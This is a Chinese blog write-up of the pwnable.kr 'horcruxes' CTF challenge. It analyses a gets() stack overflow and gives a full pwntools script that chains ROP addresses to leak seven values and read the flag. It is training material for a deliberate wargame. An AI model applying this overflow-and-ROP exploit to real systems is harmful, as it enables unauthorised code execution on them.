pwnable.kr horcruxes

最新推荐文章于 2020-08-14 21:23:07 发布
最新推荐文章于 2020-08-14 21:23:07 发布
阅读量372 收藏
点赞数
分类专栏: PWN练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/r250414958/article/details/105455891
版权
本文详细介绍了一种使用ROP(Return-Oriented Programming)技术破解游戏挑战的实战案例。通过分析目标程序的漏洞,构造特定的payload,成功绕过保护机制获取flag。文章探讨了ROP链的构造、函数调用及计算过程。
摘要由CSDN通过智能技术生成

在这里插入图片描述
看题目,好像是和ROP利用技术有相关的题目,上去看看先
在这里插入图片描述
告诉我们要链接端口9032执行,我们先把文件下下来看看,由于没有提供源码,我们直接用IDA看
函数也不长,直接看伪代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // ST1C_4

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  alarm(0x3Cu);
  hint();
  init_ABCDEFG();
  v3 = seccomp_init(0);
  seccomp_rule_add(v3, 2147418112, 173, 0);
  seccomp_rule_add(v3, 2147418112, 5, 0);
  seccomp_rule_add(v3, 2147418112, 3, 0);
  seccomp_rule_add(v3, 2147418112, 4, 0);
  seccomp_rule_add(v3, 2147418112, 252, 0);
  seccomp_load(v3);
  return ropme();
}

直接看ropme()

int ropme()
{
  char s[100]; // [esp+4h] [ebp-74h]
  int v2; // [esp+68h] [ebp-10h]
  int fd; // [esp+6Ch] [ebp-Ch]

  printf("Select Menu:");
  __isoc99_scanf("%d", &v2);
  getchar();
  if ( v2 == a )
  {
    A();
  }
  else if ( v2 == b )
  {
    B();
  }
  else if ( v2 == c )
  {
    C();
  }
  else if ( v2 == d )
  {
    D();
  }
  else if ( v2 == e )
  {
    E();
  }
  else if ( v2 == f )
  {
    F();
  }
  else if ( v2 == g )
  {
    G();
  }
  else
  {
    printf("How many EXP did you earned? : ");
    gets(s);
    if ( atoi(s) == sum )
    {
      fd = open("flag", 0);
      s[read(fd, s, 0x64u)] = 0;
      puts(s);
      close(fd);
      exit(0);
    }
    puts("You'd better get more experience to kill Voldemort");
  }
  return 0;
}

漏洞点也很明显了在gets(s);变量s是一个栈地址,而getflag的条件就是if ( atoi(s) == sum ),这个sum在哪里被赋值了我们可以交叉引用看一下
在这里插入图片描述

unsigned int init_ABCDEFG()
{
  int v0; // eax
  unsigned int result; // eax
  unsigned int buf; // [esp+8h] [ebp-10h]
  int fd; // [esp+Ch] [ebp-Ch]

  fd = open("/dev/urandom", 0);
  if ( read(fd, &buf, 4u) != 4 )
  {
    puts("/dev/urandom error");
    exit(0);
  }
  close(fd);
  srand(buf);
  a = 0xDEADBEEF * rand() % 0xCAFEBABE;
  b = 0xDEADBEEF * rand() % 0xCAFEBABE;
  c = 0xDEADBEEF * rand() % 0xCAFEBABE;
  d = 0xDEADBEEF * rand() % 0xCAFEBABE;
  e = 0xDEADBEEF * rand() % 0xCAFEBABE;
  f = 0xDEADBEEF * rand() % 0xCAFEBABE;
  v0 = rand();
  g = 0xDEADBEEF * v0 % 0xCAFEBABE;
  result = f + e + d + c + b + a + 0xDEADBEEF * v0 % 0xCAFEBABE;
  sum = result;
  return result;
}

也就是um = a + b + c + d + e + f + g,而这七个数值是随机生成的。我们回过ropme函数里看看,也有对应的字母的函数

int A()
{
  return printf("You found \"Tom Riddle's Diary\" (EXP +%d)\n", a);
}
...

这里省略去后面的函数,因为都是一样的功能,把对应自身字母的数值给打印出来然后返回。
我们再查看一下程序开启的保护
在这里插入图片描述
发现程序没有开启PIE也就是ASLR随机地址载入的保护机制,
同样没有发现Canary对栈指针进行保护。但是可以明显发现该程序实现了NX栈不可执行的保护。
到这里,利用思路大概就有了
首先在IDA pro反汇编出的伪代码中已经标记出了sbuffer的大小和起始地址:[ebp - 0x74]
在这里插入图片描述
基于此我们可以推断出buffer的起始地址到ropme()反回地址的距离应该为0x74 + 4。
多出的这4个bytes长度是存放原函数ebp地址的数据长度。所以可以初步判断
padding的大小为0x78 = 120个bytes数据。
然后在后面追加每个对应 a + b + c + d + e + f + g地址的rop链,获取数值计算,最后返回到main函数中调用ropme()函数的地方执行ropme()
然后再把计算好的sum输入进去,就可以getflag
在IDA里把对应的函数地址找到

call A() --> 0x809fe4b
call B() --> 0x809fe6a
call C() --> 0x809fe89
call D() --> 0x809fea8
call E() --> 0x809fec7
call F() --> 0x809fee6
call G() --> 0x809ff05
main <call ropme> --> 0x809fffc

所以构造出的payload为:

'A' * 120 + 0x809fe4b + 0x809fe6a + 0x809fe89 + 0x809fea8 + 0x809fec7 + 0x809fee6 + 0x809ff05 + 0x809fffc

用pwntools写是这样的

from ctypes import c_int
from pwn import *
from pwnlib.util.proc import wait_for_debugger
context.arch = 'i386'

context.log_level = 'debug'

#s = ssh("horcruxes", "pwnable.kr", port=2222, password="guest")
#p = s.connect_remote('localhost', 9032)

p = process('./horcruxes',stdin=PTY)
wait_for_debugger(p.pid)
#r = remote('pwnable.kr', 9032) 

padding = 'A' * 0x78
A = 0x0809FE4B
B = 0x0809FE6A
C = 0x0809FE89
D = 0x0809FEA8
E = 0x0809FEC7
F = 0x0809FEE6
G = 0x0809FF05
ropme = 0x0809FFFC
stage1 = flat(padding, A, B, C, D, E, F, G, ropme,endianness='little', word_size=32, sign=False)

p.recvuntil('Menu:')
p.sendline('1')
p.recvuntil('earned? : ')
p.sendline(stage1)

s = 0 
for i in xrange(7):
    p.recvuntil('EXP +')
    s += int(p.recvline()[:-2])
    #s &= 0xffffffff

s = c_int(s).value
p.recvuntil('Menu:')
p.sendline('1')
p.recvuntil('earned? : ')
p.sendline(str(s))
print p.recvline()

这是我本地调试时候用的,如果要连上pwnable.kr则要把注释去掉,再注释掉dbg的代码就可以了

这里我用本地调试的代码说明
可以看到执行后堆栈被覆盖
在这里插入图片描述
retn的时候已经进入我们准备的rop链
在这里插入图片描述
等rop链完成后我们再次进入ropme(),输入了正确的sum,然后成功跳转到获取flag的流程中了
在这里插入图片描述
还有网上很多大佬的wp都说不能直接返回ropme()函数里面的任何一个位置,我尝试了一下,产生了如下错误
在这里插入图片描述
查了一下错误提示,大概意思是

当应用程序尝试访问未分配的存储区/无效的存储区/对该应用程序的未对齐访问时,将发生SIGSEGV问题

这里我也没有去深入研究,望知道的大佬教教弟弟

这里再记一个小坑,在我准备调试程序的时候发现
在这里插入图片描述
缺少库文件
然后我使用了如下命令去更新

sudo apt-get update && sudo apt-get install libseccomp2

发现还是没有解决这个错误,然后又找了好久,直到看到了这个帖子

https://askubuntu.com/questions/721357/is-it-safe-to-install-old-libraries-wine-issue

才发现原来是32位程序的问题,需要这样改一下

sudo apt-get update && sudo apt-get install libseccomp2:i386

我哭了:(
在这里插入图片描述

QQQqQqqqqrrrr
关注
专栏目录
pwnable.krhorcruxes - 伏地魔的7个魂器 gets栈溢出 截断 atoi转化
think_ycx的专栏
11-24 1598
本关信息 伏地魔吧自己分裂的灵魂藏在了7哥魂器中…这个描述666。本关要求我们找到所有的魂器然后ROP似乎就可以拿flag了。本关没有给源码,上IDA分析吧。本地运行前安装32位libseccomp库,apt-get install libseccomp-dev:i386。 init初始化abcdefg7个int值,保存在bss段,并计算sum。abcdefg的值生成时使用随机数做为种...
horcruxes-pwnable
SkYe's Blog
10-04 805
前言 这题考的是ROP系统攻击。百度百科是这样介绍的: 简介:ROP全称为Return-oriented Programming(面向返回的编程)。是一种基于代码复用的攻击技术,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 内在特征:1. ROP控制流中,call和ret指令不操纵函数,而是用于将函数里面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开...
PWN horcruxes [pwnable.kr]CTF writeup题解系列15
重新启程
01-06 882
题目内容: 先连接上去看看题目文件,看起来已经说了是一道rop的题目 root@mypwn:/ctf/work/pwnable.kr# ssh horcruxes@pwnable.kr -p2222 horcruxes@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ ...
ROP攻击:Challenge 0x14: Horcruxes
jiuweideqixu的博客
08-14 379
Voldemort concealed his splitted soul inside 7 horcruxes. Find all horcruxes, and ROP it! author: jiwon choi ssh horcruxes@pwnable.kr -p2222 (pw:guest) 登录进去之后发现,只有二进制可执行文件,没有源文件。所以为了加快分析,需要借助ida的反编译功能。 反编译之后,可以看到各个函数的结构如下: int A() { return prin.
pwnable.kr之flag
river
05-02 2624
flag   下载下来是upx 压缩过的文件,用upx –d 解压一下,变为flag_upacked_upx文件,然后再IDA中看。   对flag_upacked_upx用strings 看一下,提取:)特征。(因为这个是pwnable.kr的flag的特征。。。又作弊了) 发现是正确的。。 flag: UPX...? sounds like a deli
pwnable.krhorcruxes
子曰小玖的博客
06-06 412
https://blog.csdn.net/think_ycx/article/details/84405387 本关信息 伏地魔吧自己分裂的灵魂藏在了7哥魂器中…这个描述666。本关要求我们找到所有的魂器然后ROP似乎就可以拿flag了。本关没有给源码,上IDA分析吧。本地运行前安装32位libseccomp库,apt-get install libseccomp-dev:i386。 ...
pwnable.kr
ACdream
04-22 664
从头开始学习ctf-pwn
pwnable.kr fd
weixin_44795952的博客
04-07 213
pwnable.kr:fd 连入: ssh fd@pwnable.kr -p2222 输入密码:guest ls cat flag发现 Permission denied 继续cat fd.c 关于main函数参数: agrc代表 agrv[] 的个数 默认为1:即agrv[0] 参数默认为文件名 我们需要知道read函数: read() 用于文件描述符对应的文件中读取数据,原型: ssiz...
pwnable.kr [fd]
shisuan1的博客
11-05 249
pwnable.kr [fd] Mommy! what is a file descriptor in Linux? try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu.be/971eZhMHQQw ssh fd@pwnable....
horcrux:将您的文件分割成加密的片段,这样您就无需记住密码了
04-05
例如,如果我有3个,我可能想要5个horcruxes来恢复该文件。该horcrux文件将按以下方式创建: diary_1_of_5.horcrux diary_2_of_5.horcrux ... 现在,您只需要在各种USB或在线位置上散布房屋周围的杂物,并希望您能...
全面剖析Pwnable.kr unlink
Bill
08-10 2132
   最近一直在学习堆方面的知识,unlink是CTF中考察堆方面知识的重点.于是就拿一道简单的例题来剖析一下.堆方面的PWN对内存的分配和回收机制要求比较高,也是CTF中压轴题. 目录: 知识简介 漏洞分析 漏洞利用 Write Up及相关链接 知识简介: 为了节约内存,被使用之后的chunk和未使用的chunk的内存布局不相同,但是都用了相同的大小,于是free...
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3107
终于打到第二关了... 这题考察GOT覆写
pwnable.kr】fb
weixin_30785593的博客
06-29 178
这是pwnable.kr的签到题,记录pwn入门到放弃的第一篇。 ssh fd@pwnable.kr -p2222 (pw:guest) 题目很简单,登录上了ssh后,发现了3个文件:fd,fd.c,flag 首先下载fd.c 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <str...
pwnable.kr详细通关秘籍(二)
dfdhxb995397的博客
09-27 402
i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考到了很多linux下的基本操作,参数输入、管道符、进程间通信等知识,推荐大家可以先看看《深入理解计算机系统这本书》,补补基础 1、Step1(argv) if(ar...
pwnable.kr leg
r250414958的博客
08-03 236
看一下题目 提供了两个文件下载,我们来直接看一下 <leg.c> #include <stdio.h> #include <fcntl.h> int key1(){ asm("mov r3, pc\n"); } int key2(){ asm( "push {r6}\n" "add r6, pc, $1\n" "bx r6\n" ".code ...
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3167
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
小白pwn之旅之pwnable05
qq_41078843的博客
05-01 226
pwnable-----mistack和shellshock pwnable 看源码 #include <stdio.h> #include <fcntl.h> #define PW_LEN 10 #define XORKEY 1 void xor(char* s, int len){ int i; for(i=0; i<len; i++){ s[i]...
pwnable.kr-passcode WP
Casuall的博客
03-30 502
首先用ssh连进去,一个可执行文件,一个源码文件,一个flag文件,先执行passcode程序,让你输入name,passcode1,passcode2,如图。 我们先用scp命令把文件拷贝下来,scp -P2222 passcode@pwnable.kr:passcode . ,注意后面有一个点,表示拷贝到当前目录的意思。然后看一下源码 #include <stdio.h> #in...
pwnable.kr】 blukat - 权限设置不当导致password可读
think_ycx的专栏
11-24 729
本关描述 这一关看着描述就挺奇怪的,scp下来之后居然把password改copy下来了,内容是cat: password: Permission denied。照理没有权限读的话是不会copy下来的。ssh上去看一下就明白了(如下图),当前用户在blukat_pwn组,因此是可以读password的。 看一下代码写的没问题,读取password和输入比较,如果比较成功就输出flag。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值